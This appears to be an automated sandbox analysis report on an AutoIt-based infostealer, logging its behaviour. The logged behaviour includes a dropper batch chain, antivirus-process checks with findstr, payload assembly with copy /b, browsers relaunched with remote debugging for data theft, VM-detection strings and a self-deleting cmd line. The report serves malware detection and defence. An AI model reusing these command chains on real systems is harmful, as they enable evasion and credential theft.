                Source: chrome.exe, 00000011.00000002.2641864869.000047E400A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};G
                Source: FK68QQ16F.12.dr, D2DTJM79R.12.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\ChoForgot.exe File read: C:\Users\user\Desktop\ChoForgot.exe
                Source: unknown Process created: C:\Users\user\Desktop\ChoForgot.exe "C:\Users\user\Desktop\ChoForgot.exe"
                Source: C:\Users\user\Desktop\ChoForgot.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 623615
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Distances
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Duck" Ix
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\623615\Wb.com Wb.com f
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3
                Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DistancesJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Duck" Ix Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\623615\Wb.com Wb.com fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3
                Source: C:\Users\user\Desktop\ChoForgot.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: ChoForgot.exe Static file information: File size 1111393 > 1048576
                Source: ChoForgot.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\ChoForgot.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
                Source: ChoForgot.exe Static PE information: real checksum: 0x119f67 should be: 0x112cbb
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_00FD0DE6 push ecx; ret 12_2_00FD0DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\623615\Wb.com

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_010426DD
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FCFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00FCFC7C
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103420
                Source: Wb.com, 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: Wb.com, 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LAPI_LOG.DLLPS
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 5776Thread sleep count: 90 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101DC54
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A1E2
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0102A087
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0102A570
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0101E472
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEC622 FindFirstFileExW,12_2_00FEC622
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010266DC FindFirstFileW,FindNextFileW,FindClose,12_2_010266DC
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01027333 FindFirstFileW,FindClose,12_2_01027333
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_010273D4
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0101D921
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00FB5FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\623615\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: chrome.exe, 00000011.00000002.2637344997.000047E400074000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: Web Data.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: Web Data.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: chrome.exe, 00000011.00000002.2644529759.000047E401168000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: Web Data.22.drBinary or memory string: discord.comVMware20,11696487552f
                Source: Web Data.22.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: Wb.com, 0000000C.00000002.3031181433.0000000004591000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3031181433.00000000045A8000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000002.3030376312.0000000001BCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Web Data.22.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: msedge.exe, 00000014.00000003.2697288580.00005B8002514000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: global block list test formVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: Web Data.22.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: chrome.exe, 00000011.00000002.2630172245.000001EE714E8000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2767628642.0000028218A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Web Data.22.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Web Data.22.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Web Data.22.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: chrome.exe, 00000011.00000002.2642507686.000047E400C78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=23632f1d-d6db-48ce-b80d-ec484711636a
                Source: Web Data.22.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: Web Data.22.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Web Data.22.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: Web Data.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: Web Data.22.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102F4FF BlockInput,12_2_0102F4FF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00FB338B
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD5058 mov eax, dword ptr fs:[00000030h]12_2_00FD5058
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01012150 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,12_2_01012150
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FE2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00FE2992
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00FD0BAF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0D45 SetUnhandledExceptionFilter,12_2_00FD0D45
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00FD0F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01011B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_01011B4D
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00FB338B
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101BBED SendInput,keybd_event,12_2_0101BBED
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01032D37 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,12_2_01032D37
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DistancesJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Duck" Ix Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\623615\Wb.com Wb.com fJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_010114AE
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01011FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_01011FB0
                Source: Wb.com, 0000000C.00000000.2155688568.0000000001073000.00000002.00000001.01000000.00000007.sdmp, Wb.com.2.dr, Ensures.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Wb.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD0A08 cpuid 12_2_00FD0A08
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0100E5F4 GetLocalTime,12_2_0100E5F4
